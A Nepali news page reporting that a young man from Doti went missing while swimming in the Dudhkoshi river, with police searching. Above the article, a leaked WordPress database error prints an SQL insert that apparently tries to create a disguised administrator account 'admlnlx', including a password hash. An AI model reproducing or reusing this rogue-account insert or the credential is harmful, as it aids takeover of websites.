WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAIHe38LV4Is6weN8HoLmyp1sHKedO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 07:58:03', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ३० साउन, सोलुखुम्बु । दुधकोशी नदीमा पौडी खेल्ने क्रममा डोटीका चन्द्र बहादुर खड्का बेपत्ता भएका छन् ।
आज बिहान करिब १० बजेको समयमा ओखलढुङगाको खानिभञ्ज्याङ र खोटाङको ज्यामिरे जोड्ने सिलौरीघाटको पुल नजिकैबाट दुधकोशी नदीमा पौडी खेल्ने क्रममा डोटी जिल्लाको पूर्वी चौकी गाउँपालिका ७ का अन्दाजी २० बर्षीय चन्द्र बहादुर खड्का बेपत्ता भएका हुन् ।
नमस्ते अल इन्टरनेश्नल जमल काठमाण्डौबाट आर्युबेदिक औषधि बिक्रिका लागि एैसेलुखर्क जाँदै गरेको ६ जनाको टोलीमा समाबेश खड्का गर्मी छल्न नदीमा पौडी खेल्न पसेका थिए ।
बेपत्ताको ओखलढुङगा र खोटाङबाट खटिएका प्रहरीले खोजीकार्य जारी राखेको छ ।
साभार: हिमाल एफ एम